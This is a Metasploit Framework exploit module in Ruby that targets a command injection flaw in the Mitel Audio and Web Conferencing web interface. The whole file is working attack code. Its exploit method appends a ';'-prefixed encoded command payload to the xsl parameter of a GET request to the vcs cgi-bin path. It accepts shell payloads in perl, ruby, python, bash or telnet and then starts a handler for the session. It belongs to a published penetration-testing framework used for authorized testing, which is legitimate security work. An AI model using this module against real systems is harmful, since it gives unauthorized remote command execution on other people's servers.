metasploit-framework/modules/exploits/unix/webapp/mitel_awc_exec.rb

79 lines
1.9 KiB
Ruby
Raw Normal View History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
'Description' => %q{
This module exploits a command injection flaw within the Mitel
Audio and Web Conferencing web interface.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
['OSVDB', '69934'],
# ['CVE', ''],
# ['BID', '']
],
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'BadChars' => "<>",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 2010'
))
register_options(
[
OptString.new('URIPATH', [ true, "The path to the vcs cgi-bin binary", "/awcuser/cgi-bin/vcs" ])
], self.class)
end
def exploit
print_status("Attempting to execute our command..")
res = send_request_cgi(
{
'uri' => datastore['URIPATH'],
'method' => 'GET',
'vars_get' => {
'xml' => 'withXsl',
'xsl' => ';' + payload.encoded
}
}, 10)
if res and res.code.to_i > 200
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
return
end
handler
end
end